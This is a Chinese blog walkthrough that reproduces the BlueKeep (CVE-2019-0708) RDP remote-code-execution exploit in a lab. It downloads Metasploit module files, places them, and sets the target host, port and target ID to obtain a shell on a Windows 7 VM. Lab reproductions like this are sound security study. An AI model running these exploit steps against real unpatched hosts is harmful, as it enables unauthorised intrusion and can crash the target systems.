zoukankan      html  css  js  c++  java
  • CVE-2019-0708漏洞利用复现

    CVE-2019-0708漏洞利用复现

    距离这个漏洞爆出来也有好几个月了,之前一直忙也没来得及写文档,现在重新做一遍。

    准备环境:
    win7靶机 IP地址:172.16.15.118
    Kali攻击机 IP地址:172.16.15.50
    

    这里需要提醒的是kali机上的msf工具更新到最新,不然加载cve-2019-0708模块的时候会看不见

    下载漏洞模块
    # 直接在kali中使用命令下载
    wget https://raw.githubusercontent.com/rapid7/metasploitframework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
    
    wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    
    wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    
    wget https://github.com/rapid7/metasploitframework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    
    
    下载好后文件如下:

    1573702325703

    将文件移动到指定位置:
    rdp.rb 移动到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录
    
    rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploitframework/modules/auxiliary/scanner/rdp 目录
    
    cve_2019_0708_bluekeep_rce.rb 放进/usr/share/metasploitframework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。
    

    环境准备完毕

    漏洞利用

    首先输入msfconsole进入msf攻击框架

    1573702498628

    输入reload_all对模块进行重新加载

    1573702681465

    输入search cve-2019-0708查询我们将要利用的漏洞模块

    1573702753955

    我们的漏洞模块已经成功加载进去了

    通过use exploit/windows/rdp/cve_2019_0708_bluekeep_rce命令调用模块

    进入模块后输入show options 查看我们需要设置的参数

    1573702904605

    如果不清楚参数具体值的话可用通过show命令来查看

    具体设置:

    设置靶机IP地址:set RHOSTS 172.16.15.118
    设置攻击端口:set rport 3389
    设置targets ID:set target 4
    

    1573703184626

    使用run或exploit命令进行攻击

    1573703257028

    看到这里我们已经成功获取到目标的shell了

    总结及问题:

    1.该漏洞在进行攻击的时候很容易会将靶机打到蓝屏,如果没有成功就多试几次,但不要在进行服务的电脑上测试

    2.加载漏洞模块的时候,如果没加载出来,就将msf更新到最新,在重新下载复制一遍

  • 相关阅读:
    IDEA导入外部jar包步骤
    将本地新建工程推到git上
    【转】Memcached与Redis有什么区别
    Redis
    JavaScript-Tool-lhgDialog-js:lhgdialog.js
    信息安全-HTTP:HTTP 身份验证
    信息安全-HTTP:HTTP访问控制(CORS)
    JavaScript-Tool-lhgDialog:框架示例
    JavaScript-Tool-lhgDialog:动画示例-源代码
    JavaScript-Tool-lhgDialog:动画示例
  • 原文地址:https://www.cnblogs.com/yanlzy/p/11856091.html
Copyright © 2011-2022 走看看